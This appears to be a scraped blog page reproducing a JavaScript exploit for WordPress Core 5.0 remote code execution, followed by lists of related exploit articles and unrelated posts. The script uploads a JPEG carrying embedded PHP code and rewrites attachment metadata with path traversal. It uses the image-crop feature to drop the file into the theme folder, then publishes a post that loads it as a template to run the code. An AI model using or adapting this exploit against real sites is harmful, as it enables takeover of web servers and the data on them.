var wpnonce = '';

var ajaxnonce = '';

var wp_attached_file = '';

var imgurl = '';

var postajaxdata = '';

var post_id = 0;

var cmd = '<?php phpinfo();/*';

var cmdlen = cmd.length

var payload = '\xff\xd8\xff\xed\x004Photoshop 3.0\x008BIM\x04\x04'+'\x00'.repeat(5)+'\x17\x1c\x02\x05\x00\x07PAYLOAD\x00\xff\xe0\x00\x10JFIF\x00\x01\x01\x01\x00`\x00`\x00\x00\xff\xdb\x00C\x00\x06\x04\x05\x06\x05\x04\x06\x06\x05\x06\x07\x07\x06\x08\x0a\x10\x0a\x0a\x09\x09\x0a\x14\x0e\x0f\x0c\x10\x17\x14\x18\x18\x17\x14\x16\x16\x1a\x1d%\x1f\x1a\x1b#\x1c\x16\x16 , #&\x27)*)\x19\x1f-0-(0%()(\xff\xc0\x00\x0b\x08\x00\x01\x00\x01\x01\x01\x11\x00\xff\xc4\x00\x14\x00\x01'+'\x00'.repeat(15)+'\x08\xff\xc4\x00\x14\x10\x01'+'\x00'.repeat(16)+'\xff\xda\x00\x08\x01\x01\x00\x00?\x00T\xbf\xff\xd9';

var img = payload.replace('\x07PAYLOAD', String.fromCharCode(cmdlen) + cmd);

var byteArray = Uint8Array.from(img, function(c){return c.codePointAt(0);});

var attachurl = '/wp-admin/media-new.php';

var uploadurl = '/wp-admin/async-upload.php';

var editattachurl = '/wp-admin/post.php?post=PID&action=edit';

var editposturl = '/wp-admin/post.php';

var addposturl = '/wp-admin/post-new.php';

var cropurl = '/wp-admin/admin-ajax.php';

console.log("Get wpnonce token.");

jQuery.get(attachurl, function(data) {

    wpnonce = jQuery(data).find('#file-form #_wpnonce').val();

    if(wpnonce) {

        console.log("Success! wpnonce: " + wpnonce);

        var postdata = new FormData();

        postdata.append('name', 'ebaldremal.jpg');

        postdata.append('post_id', post_id);

        postdata.append('_wpnonce', wpnonce);

        postdata.append('short', 1);

        // file

        var phpimage = new File([byteArray], 'ebaldremal.jpg');

        postdata.append('async-upload', phpimage);

        console.log("Upload image with shell.");

        jQuery.ajax({

            url: uploadurl,

            data: postdata,

            cache: false,

            contentType: false,

            processData: false,

            method: 'POST',

            success: function(data){

                if(jQuery.isNumeric(data)) {

                    post_id = data;

                    console.log("Success! Attach ID: " + post_id);

                    console.log("Get wpnonce for edit post, ajax_nonce for crop and URL for fun.");

                    jQuery.get(editattachurl.replace('PID', post_id), function(data) {

                        var btnid = "#imgedit-open-btn-" + post_id;

                        wpnonce = jQuery(data).find('#post #_wpnonce').val();

                        ajaxnonce = jQuery(data).find(btnid).attr('onclick').match(/[a-f0-9]{10}/)[0];

                        imgurl = new URL(jQuery(data).find('#attachment_url').val());

                        wp_attached_file = imgurl.pathname.match(/uploads\/(.*)/)[1] + "?/any";

                        console.log("Success! wpnonce: " + wpnonce + ", ajaxnonce: " + ajaxnonce);

                        if(wpnonce && ajaxnonce) {

                            console.log("Update _wp_attached_file meta key to: " + wp_attached_file);

                            postdata = {

                                '_wpnonce': wpnonce,

                                'action': 'editpost',

                                'post_ID': post_id,

                                'meta_input[_wp_attached_file]': wp_attached_file

                            }

                            jQuery.post(editposturl, postdata, function(data){

                                console.log("Success!");

                                console.log("Crop image for create help folder.");

                                postajaxdata = {

                                    '_ajax_nonce': ajaxnonce,

                                    'action': 'crop-image',

                                    'id': post_id,

                                    'cropDetails[width]': 1,

                                    'cropDetails[height]': 1

                                }

                                jQuery.post(cropurl, postajaxdata, function(data){

                                    console.log("Success! Help directory created.");

                                    wp_attached_file = imgurl.pathname.match(/uploads\/(.*)/)[1] + "?/../../../../themes/twentynineteen/owned";

                                    console.log("Update _wp_attached_file meta key to: " + wp_attached_file);

                                    postdata = {

                                        '_wpnonce': wpnonce,

                                        'action': 'editpost',

                                        'post_ID': post_id,

                                        'meta_input[_wp_attached_file]': wp_attached_file

                                    }

                                    jQuery.post(editposturl, postdata, function(data){

                                        console.log("Success!");

                                        console.log("Crop image for create evil jpg image inside twentynineteen theme folder.");

                                        jQuery.post(cropurl, postajaxdata, function(data){

                                            console.log("Success!");

                                            console.log("Get wpnonce for create new post.");

                                            jQuery.get(addposturl, function(data){

                                                console.log("Create new post and use evil jpg image as template.");

                                                if(jQuery(data).find('form.metabox-base-form').length) {

                                                    wpnonce = jQuery(data).find('form.metabox-base-form #_wpnonce').val();

                                                    post_id = jQuery(data).find('form.metabox-base-form #post_ID').val();

                                                } else {

                                                    wpnonce = jQuery(data).find('#post #_wpnonce').val();

                                                    post_id = jQuery(data).find('#post #post_ID').val();

                                                }

                                                postdata = {

                                                    '_wpnonce': wpnonce,

                                                    'action': 'editpost',

                                                    'post_ID': post_id,

                                                    'post_title': 'RCE-HERE',

                                                    'visibility': 'public',

                                                    'publish': 'Publish',

                                                    'meta_input[_wp_page_template]': 'cropped-owned.jpg'

                                                }

                                                jQuery.post(editposturl, postdata, function(data){

                                                    console.log("Success! Browse post with id = " + post_id + " to trigger RCE.")

                                                    console.log("Trying to open: " + imgurl.origin + "/?p=" + post_id + ")");

                                                    window.open(imgurl.origin + "/?p=" + post_id, '_blank');

                                                });

                                            });

                                        });

                                    });

                                });

                            });

                        }

                    });

                }

            }

        });

    }

});

[EXP]WordPress Core 5.0 - Remote Code Execution的更多相关文章

  1. [EXP]phpBB 3.2.3 - Remote Code Execution

    // All greets goes to RIPS Tech // Run this JS on Attachment Settings ACP page var plupload_salt = ' ...

  2. CVE-2014-6321 && MS14-066 Microsoft Schannel Remote Code Execution Vulnerability Analysis

    目录 . 漏洞的起因 . 漏洞原理分析 . 漏洞的影响范围 . 漏洞的利用场景 . 漏洞的POC.测试方法 . 漏洞的修复Patch情况 . 如何避免此类漏洞继续出现 1. 漏洞的起因 这次的CVE和 ...

  3. [EXP]Apache Superset < 0.23 - Remote Code Execution

    # Exploit Title: Apache Superset < 0.23 - Remote Code Execution # Date: 2018-05-17 # Exploit Auth ...

  4. [EXP]ThinkPHP 5.0.23/5.1.31 - Remote Code Execution

    # Exploit Title: ThinkPHP .x < v5.0.23,v5.1.31 Remote Code Execution # Date: -- # Exploit Author: ...

  5. [EXP]Microsoft Windows MSHTML Engine - "Edit" Remote Code Execution

    # Exploit Title: Microsoft Windows (CVE-2019-0541) MSHTML Engine "Edit" Remote Code Execut ...

  6. MyBB \inc\class_core.php <= 1.8.2 unset_globals() Function Bypass and Remote Code Execution(Reverse Shell Exploit) Vulnerability

    catalogue . 漏洞描述 . 漏洞触发条件 . 漏洞影响范围 . 漏洞代码分析 . 防御方法 . 攻防思考 1. 漏洞描述 MyBB's unset_globals() function ca ...

  7. Roundcube 1.2.2 - Remote Code Execution

    本文简要记述一下Roundcube 1.2.2远程代码执行漏洞的复现过程. 漏洞利用条件 Roundcube必须配置成使用PHP的mail()函数(如果没有指定SMTP,则是默认开启) PHP的mai ...

  8. [我的CVE][CVE-2017-15708]Apache Synapse Remote Code Execution Vulnerability

    漏洞编号:CNVD-2017-36700 漏洞编号:CVE-2017-15708 漏洞分析:https://www.javasec.cn/index.php/archives/117/ [Apache ...

  9. Tomcat put上传漏洞_CVE2017-12615( JSP Upload Bypass/Remote Code Execution)

    CVE2017-12615漏洞复现( tomcat JSP Upload Bypass /Remote Code Execution) 一.漏洞原理 在windows服务器下,将readonly参数设 ...

随机推荐

  1. Latex插图操作

    1.竖排插入两张图 \begin{figure}[h] //放在当前位置 \centering \subfigure[A given traffic flow set]{ \includegraphi ...

  2. c语言struct和c++struct的区别

    1.定义 c语言中struct是用户自定义数据类型(UDT),是一些变量的集合体:c++中struct是抽象数据类型(ADT),能给用户提供接口,能定义成员函数,能继承,能实现多态 2.成员权限设置 ...

  3. math.net 拟合

    参考:http://blog.csdn.net/ztmsimon/article/details/50524392 在论坛中总看到有人在说Math.NET Iridium,查了一下,现在被整合到Mat ...

  4. BZOJ 4407 于神之怒加强版 (莫比乌斯反演 + 分块)

    4407: 于神之怒加强版 Time Limit: 80 Sec  Memory Limit: 512 MBSubmit: 1067  Solved: 494[Submit][Status][Disc ...

  5. AngularJS实战之路由ui-view传参

    angular路由传参 首页 <!DOCTYPE html> <html ng-app="app"> <head> <title>路 ...

  6. Unix传奇

    转自 http://coolshell.cn/articles/2322.html 了解过去,我们才能知其然,更知所以然.总结过去,我们才会知道我们明天该如何去规划,该如何去走.在时间的滚轮中,许许多 ...

  7. golang web sample

    一.学习想法 用两天的时间学习golang,但这次是先不看书的,直接写代码先. 我们常习惯边看书边学习写代码,但发现过程是比较缓慢的,所以我就先想写代码, 边写边查.就我们所知,web app一般是基 ...

  8. _杂谈_C语言历史

    早期的操作系统软件主要是用汇编语言(包括UNIX操作系统在内)编写的.由于汇编语言依赖于计算机硬件,所以程序的可读性和可移植性都比较差,所以呢,为了提高操作系统软件的可读性和可移植性,最好改用高级语言 ...

  9. 20155326刘美岑2016-2017-2《Java程序设计》第三周学习总结

    20155326刘美岑2016-2017-2<Java程序设计>第三周学习总结 教材学习内容总结 基本类型和类类型 基本类型:第三章中讲述的那几种,short.long.int.byte. ...

  10. cmd如何进入d盘

    首先打开CMD 点开始 运行输入 CMD 在CMD窗口中输入 CD\(就是返回根目录) 回车 在输入 D: 即可在D盘操作状态